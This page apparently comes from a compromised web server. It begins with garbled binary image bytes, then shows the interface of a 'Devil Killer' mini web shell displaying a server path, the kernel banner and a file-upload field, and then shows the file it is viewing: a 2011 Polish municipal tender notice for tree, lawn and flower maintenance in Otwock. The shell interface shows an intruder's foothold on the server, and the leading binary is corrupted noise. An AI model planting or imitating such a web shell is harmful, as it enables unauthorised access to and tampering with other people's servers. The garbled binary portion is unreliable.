JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110426/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110426/123945-N-2011.html

<p class="kh_header"><b>Otwock: Utrzymanie i pielęgnacja zieleni na terenie miasta Otwocka w 2011 roku</b><br>
<b>Numer ogłoszenia: 123945 - 2011; data zamieszczenia: 26.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Otwock , ul. Armii Krajowej 5, 05-400 Otwock, woj. mazowieckie, tel. 022 7792001, faks 022 7794225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.otwock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i pielęgnacja zieleni na terenie miasta Otwocka w 2011 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1. Przedmiotem zamówienia jest wykonywanie na terenie  miasta Otwocka usług  w zakresie pielęgnacji,                sadzenia  i  wycinania drzew,  sadzenia  roślin  oraz  utrzymania  terenów  zielonych  w  pasach                 dróg gminnych, w parku miejskim  oraz  na  innych  terenach  należących  do  gminy.
       4.2.  Zakres  przedmiotu  zamówienia  obejmuje:
     1)  zabiegi  pielęgnacyjne w obrębie koron drzew, w tym również drzew pomników przyrody,            obejmujące usuwanie gałęzi obumarłych, nadłamanych lub wchodzących w kolizje z obiektami            budowlanymi  lub urządzeniami  technicznymi, wywóz  gałęzi  i  unieszkodliwienie,
     2)  usuwanie odrostów z pni drzew, wywóz odciętych pędów i unieszkodliwienie,      
     3)  wycinka drzew, pocięcie drewna, dostarczenie drewna we wskazane miejsce lub pozostawienie 
           w miejscu  wycinki, usunięcie pni poprzez frezowanie oraz uporządkowanie terenu,
     4)  karczowanie  pni  pozostawionych  po  wcześniejszych  wycinkach,  uporządkowanie  terenu,             wywóz  pni  i  unieszkodliwienie,
     5)  frezowanie pni pozostawionych po wcześniejszych wycinkach, uporządkowanie terenu,  wywóz              nadmiaru  trocin i unieszkodliwienie,   
     6)  sadzenie drzew liściastych o określonych przez  Zamawiającego gatunkach, o wysokości  około 
          3 m, z  bryłą  korzeniową, z  wykopaniem  dołków,  zaprawą  dołków  ziemią  urodzajną,            osadzeniem  palików - 3 szt., przywiązaniem  drzew,  podlaniem,  wykonaniem  misek  i             uporządkowaniem  terenu,
     7)  sadzenie drzew liściastych o określonych przez  Zamawiającego gatunkach, o wysokości około 
          1 m, bez  bryły  korzeniowej, z  wykopaniem  dołków,  zaprawą  dołków  ziemią  urodzajną,            podlaniem,  wykonaniem  misek  i  uporządkowaniem  terenu,  
     8)  sadzenie kwiatów na rabatach - gatunki takie jak: szałwia, aksamitka, bratek, żeniszek, begonia,            mrozy,  z  przygotowaniem  podłoża,  uzupełnieniem  ziemią  urodzajną  i  podlaniem,
     9)  pielęgnacja kwietników, tj. odchwaszczanie, spulchnianie ziemi, uzupełnianie roślin, nawożenie,             przycinanie  kwiatów, usunięcie uschniętych kwiatów, wywóz odpadów i unieszkodliwienie,
   10)  sadzenie kwiatów w wazach - gatunki takie jak: szałwia, begonia, aksamitka, petunia,          
          z uzupełnieniem ziemi urodzajnej i podlaniem,
   11)  pielęgnacja kwiatów w wazach, tj. odchwaszczanie, nawożenie, uzupełnianie roślin, przycinanie           kwiatów,  usunięcie uschniętych kwiatów, wywóz odpadów i unieszkodliwienie, 
   12)  podlewanie roślin,
   13)  zakup kwiatów w doniczkach, takie jak: pelargonia, petunia,
   14)  pielęgnacja kwiatów w doniczkach, tj. podlewanie, nawożenie i usuwanie uschniętych kwiatów,
   15)  posadzenie cebulek  tulipanów  z  przygotowaniem  podłoża,
   16)  sadzenie krzewów liściastych o określonych przez Zamawiającego gatunkach, z bryłą korzeniową,            z wykopaniem dołków, zaprawą dołków ziemią urodzajną, podlaniem i uporządkowaniem terenu,
   17)  sadzenie krzewów  iglastych o określonych przez Zamawiającego gatunkach, z bryłą korzeniową,            z wykopaniem dołków, zaprawą dołków ziemią urodzajną, podlaniem i uporządkowaniem terenu, 
   18)  pielęgnacja  starszych  krzewów,  tj. usuwanie  chwastów,  przycinanie,  wywóz  odpadów 
          i  unieszkodliwienie, 
   19)  sadzenie żywopłotów o określonych przez  Zamawiającego gatunkach,  z  wykopaniem  rowów,            zaprawą  rowów ziemią  urodzajną,  podlaniem  i  uporządkowaniem  terenu,
   20)  strzyżenie  żywopłotów  z  trzech  stron,  wywóz  odpadów  i  unieszkodliwienie,
   21)  koszenie  trawników, zebranie odpadów  oraz  wywóz  i  unieszkodliwienie,
   22)  koszenie  poboczy  ulic, zebranie odpadów  oraz  wywóz  i  unieszkodliwienie,

                 23)  koszenie  rowów  odwadniających,  zebranie odpadów  oraz  wywóz  i  unieszkodliwienie,
                 24)  usuwanie  z  poboczy  ulic  krzaków  wraz  z  korzeniami, uporządkowanie  terenu,  wywóz           
          i  unieszkodliwienie  odpadów,
   25)  skoszenie zrekultywowanego składowiska odpadów  -  bez zbierania i wywozu odpadów,
   26)  zakładanie  trawników  z  wymianą  ziemi  na  głębokość 5 cm,  uzupełnieniem  ziemią           urodzajną,  wysianiem  nasion,  ubiciem  powierzchni,  podlaniem  i  nawożeniem,
   27)  uzupełnienie  zniszczonych  trawników  z  przekopaniem  ziemi, dosianiem  trawy,  ubiciem           powierzchni,
   28)  grabienie  liści, wywóz  i  unieszkodliwienie  odpadów,
   29)  wywóz  odpadów  zielonych  na  składowisko  -  dotyczy odpadów zgromadzonych przez           mieszkańców na  terenach  należących do gminy.
       4.3.  Wyżej wymienione prace będą  realizowane w oparciu o zlecenia jednostkowe zawierające zakres 
        i  termin  wykonania,  przekazywane  przez  Zamawiającego  w  formie  pisemnej,  a  w  sytuacjach                stwarzających  zagrożenie  bezpieczeństwa  ruchu  drogowego  oraz  życia  i  zdrowia  ludzi  w  ciągu          jednej  godziny  od  chwili  polecenia  ustnego  lub  telefonicznego,  które  zostanie  potwierdzone  na          piśmie  najpóźniej  w  ciągu  trzech  dni.
4.4.	Wykonawca przystąpi do usuwania powalonych drzew  w ciągu 1 godziny od momentu zgłoszenia, a usunięcie nastąpi w czasie nie dłuższym niż 3 godziny od momentu zgłoszenia.
4.5.	Wykonawca zapewni całodobową  łączność  z  osobą  nadzorującą  prace  będące  przedmiotem zamówienia.
       4.6.  Kontrola  realizacji  przedmiotu  zamówienia  środkami  transportu  Wykonawcy.
       4.7.   Rozliczenie wykonanych  prac  następować  będzie  w  oparciu  o  zaoferowane  przez  Wykonawcę 
        w  ofercie  przetargowej  ceny  netto  po  narzutach:
       1)  za pielęgnację  1 drzewa o obwodzie pnia do 50 cm,
       2)  za pielęgnację 1 drzewa o obwodzie pnia od 51 do 100 cm,
       3)  za pielęgnację 1 drzewa o obwodzie pnia powyżej 100 cm,
       4)  za pielęgnację  1 drzewa  pomnika  przyrody,
       5)  za usunięcie odrostów  z  pnia  drzewa,
       6)  za wycięcie 1 drzewa o obwodzie pnia do 50 cm,
       7)  za wycięcie 1 drzewa o obwodzie pnia od 51 do 100 cm,
       8)  za wycięcie 1 drzewa o obwodzie pnia powyżej 100 cm,
       9)  za karczowanie 1 pnia,
     10)  za frezowanie 1 pnia,
     11)  za posadzenie 1 drzewa  liściastego o wys. około 3 m, 
     12)  za posadzenie 1 drzewa  liściastego o wys. około 1 m, 
                 13)  za posadzenie kwiatów na rabatach,  na pow. 1m2 ,
     14)  za pielęgnację  kwietnika  o pow. 1 m2,
     15)  za posadzenie  kwiatów w wazach  na pow. 1 m2,
     16)  za pielęgnację kwiatów w wazach  na pow. 1 m2,
     17)  za podlanie roślin na pow. 1 m2,
     18)  za zakup kwiatów w doniczce za 1 szt.,
     19)  za pielęgnację kwiatów w doniczce za 1 szt.,
     20)  za posadzenie cebulek tulipanów  na pow. 1 m2,
     21)  za posadzenie 1 krzewu  liściastego,
     22)  za posadzenie  1 krzewu  iglastego, 
     23)  za pielęgnację krzewów  na pow. 1 m2,
     24)  za posadzenie 1 mb żywopłotu,
     25)  za strzyżenie 1 mb żywopłotu,
     26)  za skoszenie 1 m2 trawnika, 
     27)  za skoszenie 1 m2  trawnika w parku miejskim, 
     28)  za skoszenie 1 m2  pobocza,
     29)  za skoszenie  1 m2 rowu odwadniającego,
     30)  za usunięcie krzaków z  pow. 1 m2  pobocza ulicy,
     31)  za skoszenie 1m2  zrekultywowanego składowiska odpadów,     
     32)  za założenie 1m2  trawnika,
     33)  za uzupełnienie 1 m2 zniszczonego trawnika,
     34)  za zagrabienie liści z pow.1 m2,
     35)  za wywóz 1 tony odpadów zielonych na składowisko. 
        4.8.  Do  zaoferowanych  cen   netto  po  narzutach  doliczony  zostanie  należny  podatek VAT.
        4.9.  Ceny wymienione w pkt 4.7. skalkulowane przez Wykonawcę powinny uwzględniać wszystkie
                 koszty związane z wykonaniem przedmiotu zamówienia, który został określony w pkt 4.2.
                 łącznie z  materiałami.
      4.10.  Zakres  prac  przewidywany  do  wykonania  w  okresie  obowiązywania  umowy:
      1)  pielęgnacja drzew o obwodzie pnia do 50 cm  - 40 szt.,
      2)  pielęgnacja drzew o obwodzie pnia od 51 do 100 cm  -  80 szt.,
      3)  pielęgnacja drzew o obwodzie pnia  powyżej 100 cm  -  70 szt., 
      4)  pielęgnacja drzew pomników przyrody  - 4 szt.,
           5)  usuwanie odrostów  z  pni  drzew  - 200 szt.,
           6)  wycinka drzew o obwodzie pnia do 50 cm - 50 szt.,
           7)  wycinka drzew  o obwodzie pnia  od 51 do 100 cm   - 120 szt.
      8)  wycinka  drzew  o  obwodzie  pnia  powyżej 100 cm - 120 szt.,  
      9)  karczowanie pni  -  20 szt.,
    10)  frezowanie pni  - 100 szt.,
    11)  sadzenie drzew liściastych  o wys. około 3 m  -   50 szt., 
    12)  sadzenie drzew  liściastych  o wys. około 1 m  - 500 szt.
    13)  sadzenie kwiatów na rabatach,  na  pow. 524 m2, około 12.000 szt., tj. średnio 23 szt./m2,
    14)  pielęgnacja kwietników o pow. 524 m2  -  3  krotna,
    15)  sadzenie kwiatów w wazach  na pow. 29 m2, około 600 szt., tj. średnio  20 szt./m2, 
    16)  pielęgnacja kwiatów w wazach o pow. 29 m2 -  3  krotna,
    17)  podlewanie roślin na pow. 553 m2   -  30  krotne,
    18)  zakup kwiatów w doniczkach  - 16 szt.,
    19)  pielęgnacja kwiatów w 16 doniczkach - 30  krotna,
    20)  posadzenie 5.000 szt. cebulek tulipanów  na pow. 185 m2,
    21)  sadzenie krzewów liściastych  - 150 szt.,
    22)  sadzenie krzewów iglastych  - 30 szt.
    23)  pielęgnacja krzewów  na  pow. 547 m2  -  3  krotna,
    24)  sadzenie żywopłotu - 1.000 mb,  6 szt./mb,
    25)  strzyżenie żywopłotów  - 5.900 mb  -  3  krotne,                                
    26)  koszenie trawników o pow.  80.000 m2  -   5  krotne,
    27)  koszenie trawników w parku miejskim  o pow. 50.000 m2  - 2 krotne
    28)  koszenie poboczy o pow. 50.000 m2  -  2 krotne,
    29)  koszenie rowów odwadniających o pow. 35.000 m2 ,
    30)  usuwanie krzaków z poboczy ulic  na  pow. 10.000 m2,
    31)  skoszenie  zrekultywowanego  składowiska  o pow. 54.532 m2  -  1 krotne,
    32)  zakładanie trawników  o  pow. 2.500 m2,
    33)  uzupełnienie  zniszczonych  trawników  o  pow. 1.000 m2,   
    34)  grabienie  liści  na  pow. 140.000 m2,
    35)  wywóz odpadów zielonych na  składowisko - 90 ton.
      4.11.  Zamawiający  zastrzega  sobie,  że  podane  ilości  oraz  częstotliwość  wykonania  prac  nie  są                obligatoryjne  i  mogą  ulec  zmianie  w  zależności  od  warunków  atmosferycznych  i  potrzeb.
      4.12. Cena za wywóz  na składowisko 1 tony odpadów zielonych skalkulowana przez Wykonawcę  powinna                uwzględniać koszty załadunku, koszty transportu na terenie miasta oraz na składowisko, a także koszty                składowania odpadów na składowisku.
      4.13. Ilość odpadów zielonych wywiezionych i złożonych na składowisku, o których mowa w pkt  4.2.29                 Wykonawca powinien  udokumentować potwierdzeniami wystawionymi przez składowisko.
      4.14. Całkowite wynagrodzenie należne Wykonawcy będzie uzależnione od faktycznie wykonanych prac 
                w okresie obowiązywania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 77.31.00.00-6, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest zabezpieczyć swą
ofertę wadium w wysokości 20.000,- zł (słownie: dwadzieścia tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż posiada:
a) zezwolenie na odbieranie odpadów komunalnych od właścicieli
nieruchomości z terenu Otwocka zgodnie z ustawą z dnia 13 września 1996 r.
o utrzymaniu czystości i porządku w gminach, b) zezwolenie wydane na
podstawie art. 28 ustawy z dnia 27 kwietnia 2001 r. o odpadach. (w przypadku
Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek
ten musi być spełniony przynajmniej przez jednego Wykonawcę)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże, iż
zrealizował w okresie ostatnich trzech lat przed upływem terminu składania
ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co
najmniej dwie usługi polegające na utrzymaniu i pielęgnacji zieleni (tj.
koszenie trawników i/lub wycinka drzew i/lub pielęgnacja drzew, krzewów i
żywopłotów i/lub sadzenie i pielęgnacja kwiatów i/lub koszenie poboczy i/lub
grabienie liści i/lub zakładanie trawników itp.) o wartości co najmniej
600.000,00 PLN każda. (w przypadku wspólnego ubiegania się dwóch lub
więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana będzie
ich łączna wiedza i doświadczenie)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże iż: a)
dysponuje co najmniej następującym sprzętem niezbędnym do realizacji
zamówienia: - sześć pił spalinowych, - frezarkę do pni, - łącznie dwanaście
kosiarek i kos spalinowych - sześć samochodów samowyładowczych - pojazd
z beczką na wodę o poj. min. 4000 l. do podlewania kwietników - podnośnik
koszowy (1 szt.) o wysięgu min. 25 m. (w przypadku wspólnego ubiegania się
dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia,
oceniany będzie ich łączny potencjał techniczny)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże iż: a)
dysponuje osobami zdolnymi do wykonania zamówienia, tj. co najmniej 1
osoba winna posiadać wykształcenie ogrodnicze wyższe lub średnie w zakresie
urządzania i pielęgnacji terenów zielonych oraz pięcioletnią praktykę
zawodową, oraz 1 osobę posiadającą uprawnienia do kierowania pracami
zorganizowanej zieleni zabytkowej oraz 1 osoba powinna posiadać aktualne
uprawnienia PTChD NOT ( Polskie Towarzystwo Chirurgów Drzew Naczelna
Organizacja Techniczna ) w zakresie inspektora nadzoru przy leczeniu i
pielęgnacji drzew ozdobnych III - go stopnia. (w przypadku wspólnego
ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego
zamówienia, oceniany będzie ich łączny potencjał techniczny)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli Wykonawca wykaże iż: - posiada
środki finansowe w wysokości co najmniej 150.000,00 PLN lub zdolność
kredytową w wysokości co najmniej 150.000,00 PLN, - posiada opłaconą
polisę, a w przypadku jej braku inny dokument potwierdzający, że
Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie
prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie
mniejszą niż 200.000,00 PLN. (w przypadku wspólnego ubiegania się dwóch
lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniana
będzie ich łączna sytuacja ekonomiczna i finansowa)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

